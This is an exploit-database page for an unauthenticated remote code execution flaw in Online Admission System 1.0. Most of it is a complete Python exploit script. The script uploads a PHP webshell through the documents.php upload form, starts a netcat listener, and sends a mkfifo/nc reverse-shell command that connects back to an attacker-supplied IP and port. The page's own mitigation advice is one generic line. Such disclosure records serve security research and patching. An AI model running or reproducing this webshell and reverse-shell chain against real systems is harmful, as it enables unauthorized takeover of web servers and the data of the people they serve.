header-logo
Suggest Exploit
vendor:
Online Admission System
by:
Jeremiasz Pluta
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: Online Admission System
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE:
CPE: a:rskoolrash:online_admission_system
Metasploit:
Other Scripts:
Platforms Tested: LAMP Stack (Debian 10)
2021

Online Admission System 1.0 – Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the target system. The exploit works by uploading a malicious PHP script to the target system, which is then executed by the web server. The malicious script then creates a reverse shell to the attacker's machine, allowing them to execute arbitrary commands on the target system.

Mitigation:

Ensure that all web applications are properly patched and updated. Additionally, ensure that all web applications are properly configured to prevent unauthenticated access.
Source

Exploit-DB raw data:

# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)

#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess

print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')

path = '/' #change me if the path to the /oas is in the root directory or another subdir

class Exploit:

	def __init__(self, target_ip, target_port, localhost, localport):
		self.target_ip = target_ip
		self.target_port = target_port
		self.localhost = localhost
		self.localport = localport

	def exploitation(self):
		payload = """<?php system($_GET['cmd']); ?>"""
		payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

		url = 'http://' + target_ip + ':' + target_port + path
		r = requests.Session()

		print('[*] Resolving URL...')
		r1 = r.get(url + 'documents.php')
		time.sleep(3)

		#Upload the payload file
		print('[*] Uploading the webshell payload...')
		files = {
		'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
		'ftndoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdmdoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdcdoc': ('', '', 'application/octet-stream'),
		'fide': ('', '', 'application/octet-stream'),
		'fsig': ('', '', 'application/octet-stream'),
		}
		data = {'fpicup':'Submit Query'}
		r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
		time.sleep(3)

		print('[*] Setting up netcat listener...')
		listener = subprocess.Popen(["nc", "-nvlp", self.localport])
		time.sleep(3)

		print('[*] Spawning reverse shell...')
		print('[*] Watchout!')
		r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
		time.sleep(3)

		if (r3.status_code == 200):
			print('[*] Got shell!')
			while True:
				listener.wait()
		else:
			print('[-] Something went wrong!')
			listener.terminate()

def get_args():
	parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
	parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
	parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
	parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
	parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
	args = parser.parse_args()
	return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()

Navigation

Suggest Exploit

Services By CQR